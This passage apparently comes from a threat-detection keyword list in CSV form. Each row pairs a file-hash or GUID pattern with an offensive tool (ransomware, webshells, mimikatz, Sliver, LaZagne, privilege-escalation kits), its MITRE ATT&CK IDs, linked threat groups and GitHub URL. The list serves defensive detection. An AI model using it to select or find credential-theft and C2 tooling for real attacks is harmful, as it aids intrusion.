"*b310173eac2770b78f821900614fc900502e4cbe506daa55cd1baae3f22fa4cf*",".{0,1000}b310173eac2770b78f821900614fc900502e4cbe506daa55cd1baae3f22fa4cf.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","#filehash","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","34608"
"*b31812e5b4c63c5b52c9b23e76a5ea9439465ab366a9291c6074bfae5c328e73*",".{0,1000}b31812e5b4c63c5b52c9b23e76a5ea9439465ab366a9291c6074bfae5c328e73.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34610"
"*b31fc5e7f730a95d7cfc83476e543e00f94bae8f3635101c4b991f0d664ac0d2*",".{0,1000}b31fc5e7f730a95d7cfc83476e543e00f94bae8f3635101c4b991f0d664ac0d2.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#filehash","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","34612"
"*b321b10726f3cf1152c5a613bfd48a215518410179ae8de59eeaff0a141aac38*",".{0,1000}b321b10726f3cf1152c5a613bfd48a215518410179ae8de59eeaff0a141aac38.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34613"
"*b322f5fecd5a638b4164130a96835085e46d3f682f05ad402261419bea71f79b*",".{0,1000}b322f5fecd5a638b4164130a96835085e46d3f682f05ad402261419bea71f79b.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","34614"
"*b3240430623b16bab37181f538e1f2ad9c1dacd9e55f1dad013b9e2269d3cc93*",".{0,1000}b3240430623b16bab37181f538e1f2ad9c1dacd9e55f1dad013b9e2269d3cc93.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","34615"
"*b32415b6a08d324394ac97c20a27b5f5bd2425f4f7caef7bf75b733c6fe5f2fb*",".{0,1000}b32415b6a08d324394ac97c20a27b5f5bd2425f4f7caef7bf75b733c6fe5f2fb.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","34616"
"*b32521b722e44343d730559adf79326d2f4e3126417d934319ab4088185e0f7b*",".{0,1000}b32521b722e44343d730559adf79326d2f4e3126417d934319ab4088185e0f7b.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#filehash","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","34617"
"*b32776836ec9757de71ab8306f38ba4b2d3e556c5bf7036221c2153619c4dafc*",".{0,1000}b32776836ec9757de71ab8306f38ba4b2d3e556c5bf7036221c2153619c4dafc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","34618"
"*b33858d4365b180692b8dd37ce721ffab80d6953a3a1505a6e56973b63c2520d*",".{0,1000}b33858d4365b180692b8dd37ce721ffab80d6953a3a1505a6e56973b63c2520d.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","34620"
"*b350e1226b7d00487b47bec0f48320e85e3fb2546dc359cba3f2d77c75b5c599*",".{0,1000}b350e1226b7d00487b47bec0f48320e85e3fb2546dc359cba3f2d77c75b5c599.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","34621"
"*B35266FB-81FD-4671-BF1D-CE6AEF8B8D64*",".{0,1000}B35266FB\-81FD\-4671\-BF1D\-CE6AEF8B8D64.{0,1000}","offensive_tool_keyword","PrivFu","inspect token information","T1057","TA0007","N/A","N/A","Discovery","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","TokenDump","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","34622"
"*b35ef52872291ca02dd05f9caba9ac7f93b81407c253d7746673ca51c53d1c52*",".{0,1000}b35ef52872291ca02dd05f9caba9ac7f93b81407c253d7746673ca51c53d1c52.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","34623"
"*B362EC25-70BD-4E6C-9744-173D20FDA392*",".{0,1000}B362EC25\-70BD\-4E6C\-9744\-173D20FDA392.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#GUIDproject","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","34624"
"*b3639781bbed6842e8168ad211da8d0d3ba32d47152c2bc2e57f056665232ddd*",".{0,1000}b3639781bbed6842e8168ad211da8d0d3ba32d47152c2bc2e57f056665232ddd.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34625"
"*b373730fd4b62553b6a5af092835918243ea29bef6f559849fc8131c935cb6cf*",".{0,1000}b373730fd4b62553b6a5af092835918243ea29bef6f559849fc8131c935cb6cf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34626"
"*B374K*index.php*",".{0,1000}B374K.{0,1000}index\.php.{0,1000}","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/b374k/b374k","1","0","N/A","N/A","N/A","10","2462","747","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z","34627"
"*b37aa3dcdebe406d652a4cfc3fb54168ea6525787fca00876452823f8b33605e*",".{0,1000}b37aa3dcdebe406d652a4cfc3fb54168ea6525787fca00876452823f8b33605e.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","34629"
"*b37eeeceb6addc2243bca9c408ee13554726772d*",".{0,1000}b37eeeceb6addc2243bca9c408ee13554726772d.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","34630"
"*b3804cac36175125199ddd8f6840749ead5c723d9641670d244d0a487fcf555c*",".{0,1000}b3804cac36175125199ddd8f6840749ead5c723d9641670d244d0a487fcf555c.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","#filehash","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","34631"
"*b389754716da0100ccf85c210ac5759b57ad364cd13ef5feb7dca7c53627075f*",".{0,1000}b389754716da0100ccf85c210ac5759b57ad364cd13ef5feb7dca7c53627075f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34632"
"*b38dd36a7b348f6350623b1156c9f8805f323dbb9d1dad4b599b6712b8962e82*",".{0,1000}b38dd36a7b348f6350623b1156c9f8805f323dbb9d1dad4b599b6712b8962e82.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","34634"
"*b3917dd81417aa8ed07f4a60b34853ea6fae2710a3b5812da455328e38b9e7e6*",".{0,1000}b3917dd81417aa8ed07f4a60b34853ea6fae2710a3b5812da455328e38b9e7e6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34635"
"*b394dc8dd4e30635b73da61c974d966752ed7712e6a4116b257baee6f7d1718f*",".{0,1000}b394dc8dd4e30635b73da61c974d966752ed7712e6a4116b257baee6f7d1718f.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","34636"
"*b39fc6b0494a3543d3a96e7521f902268b447625aecacff3b241a8ce0b6419f8*",".{0,1000}b39fc6b0494a3543d3a96e7521f902268b447625aecacff3b241a8ce0b6419f8.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","34639"
"*b3a068eaaaefa3f21836c4628ad89fcf8cb20cdb22bc7a188e0b9be9aa29a9c3*",".{0,1000}b3a068eaaaefa3f21836c4628ad89fcf8cb20cdb22bc7a188e0b9be9aa29a9c3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34640"
"*b3a161043abbacb0b787da084f3222a1d3432aaff6f9fd16a244a42747ab6d8f*",".{0,1000}b3a161043abbacb0b787da084f3222a1d3432aaff6f9fd16a244a42747ab6d8f.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","34641"
"*b3ae1abc15df71a69f3a629fbe5a168acc7514905d8fd82eb8c62e60f61e846e*",".{0,1000}b3ae1abc15df71a69f3a629fbe5a168acc7514905d8fd82eb8c62e60f61e846e.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","34642"
"*b3afbfb23b2dc699e008d6331bb6548ca2eff4af4239eba06e55112338b7611d*",".{0,1000}b3afbfb23b2dc699e008d6331bb6548ca2eff4af4239eba06e55112338b7611d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34643"
"*b3b092ecd0cdb03ec5c038d281b5acc2dec8f01ea55b5742f81410f4f54ff9e2*",".{0,1000}b3b092ecd0cdb03ec5c038d281b5acc2dec8f01ea55b5742f81410f4f54ff9e2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34644"
"*b3b1853594a5c1c6ec5d8338b4a22daf42b8ccdf2c10b3966a8db3c46377b52a*",".{0,1000}b3b1853594a5c1c6ec5d8338b4a22daf42b8ccdf2c10b3966a8db3c46377b52a.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","34645"
"*b3ba329c974ac0a0ba97b9b63c91f562e80324c8c95ca22d7f004391f51aa51d*",".{0,1000}b3ba329c974ac0a0ba97b9b63c91f562e80324c8c95ca22d7f004391f51aa51d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34647"
"*b3bd575e9d0dfd646355151333d400d81f9f7250a51937004809ad922d8e049b*",".{0,1000}b3bd575e9d0dfd646355151333d400d81f9f7250a51937004809ad922d8e049b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34648"
"*b3c00fe058ad002b26112c1989f4237d986b6cf5c9e3dfd5029d0c9169330f34*",".{0,1000}b3c00fe058ad002b26112c1989f4237d986b6cf5c9e3dfd5029d0c9169330f34.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34649"
"*b3c03d75ad1fb5de827f2749a16b03e355d9f63651c29629d979d57074e79c09*",".{0,1000}b3c03d75ad1fb5de827f2749a16b03e355d9f63651c29629d979d57074e79c09.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34650"
"*b3c2a6fe40c1c3688b2ea12b7211a3573f1fcfb0fc092e20826db40f8a2fba63*",".{0,1000}b3c2a6fe40c1c3688b2ea12b7211a3573f1fcfb0fc092e20826db40f8a2fba63.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","34652"
"*b3c508a09116d5c4b63ea3b64ba54585a92ae84f3f94d73a9528b47357552da8*",".{0,1000}b3c508a09116d5c4b63ea3b64ba54585a92ae84f3f94d73a9528b47357552da8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34653"
"*b3c6cc7abf073f7d2faa2ba4212f7b2fd316c50cd07b9001eb40ca73d35c7128*",".{0,1000}b3c6cc7abf073f7d2faa2ba4212f7b2fd316c50cd07b9001eb40ca73d35c7128.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34654"
"*b3d052b346f0dce5b8bb7801ebe26fee1bbf156a0072eaeff0bc29ce3a837b9b*",".{0,1000}b3d052b346f0dce5b8bb7801ebe26fee1bbf156a0072eaeff0bc29ce3a837b9b.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","34656"
"*b3d610e1b65dc16e081de173a8ea83f9f0c40fb8bb5cf73e3206294b013485b4*",".{0,1000}b3d610e1b65dc16e081de173a8ea83f9f0c40fb8bb5cf73e3206294b013485b4.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","34658"
"*b3d7df3faa7bbeddf70a0c3cb586ce3d38aa1bfd787da67dd2338ec72a27bb74*",".{0,1000}b3d7df3faa7bbeddf70a0c3cb586ce3d38aa1bfd787da67dd2338ec72a27bb74.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","34659"
"*b3d8d191ad67acaae2773e5fcd477a265629902f364f5b6b51b308c6ee228a79*",".{0,1000}b3d8d191ad67acaae2773e5fcd477a265629902f364f5b6b51b308c6ee228a79.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34660"
"*b3da8fb4ec21437e3a9b7118e9eb2da1a3b83fa202e546c64533d40e719263d7*",".{0,1000}b3da8fb4ec21437e3a9b7118e9eb2da1a3b83fa202e546c64533d40e719263d7.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","34661"
"*b3eba9d048c4b7cd8e01d81baa74daf0eb097f584c946ac0ab10ba08de1a8d7b*",".{0,1000}b3eba9d048c4b7cd8e01d81baa74daf0eb097f584c946ac0ab10ba08de1a8d7b.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","34663"
"*b3ed38872b50a110a8704d1d2eb4e6e47ed6f2998d1bd08b712f840cc3a4643a*",".{0,1000}b3ed38872b50a110a8704d1d2eb4e6e47ed6f2998d1bd08b712f840cc3a4643a.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","34665"
"*b3f9b4b2534e4e7cf71b72d5f37b0745e0f6eda8ecc81c1e4139319f4cd56b34*",".{0,1000}b3f9b4b2534e4e7cf71b72d5f37b0745e0f6eda8ecc81c1e4139319f4cd56b34.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","34668"
"*b3fc8195cc5265fe46562d4063d259fe5e56835b06f598be324af18c0adb39b1*",".{0,1000}b3fc8195cc5265fe46562d4063d259fe5e56835b06f598be324af18c0adb39b1.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","34670"
"*b3fd7e46fd54a5a6271012b29414c1ed3cc162b942d8693b88fff76acf312277*",".{0,1000}b3fd7e46fd54a5a6271012b29414c1ed3cc162b942d8693b88fff76acf312277.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34671"
"*b3rito*yodo*",".{0,1000}b3rito.{0,1000}yodo.{0,1000}","offensive_tool_keyword","yodo","This tool proves how easy it is to become root via limited sudo permissions. via dirty COW or using Pa(th)zuzu. ","T1068 - T1078 - T1529","TA0004 - TA0008","N/A","N/A","Exploitation tool","https://github.com/b3rito/yodo","1","1","N/A","N/A","N/A","3","207","22","2017-02-28T15:38:13Z","2016-11-13T21:02:03Z","34672"
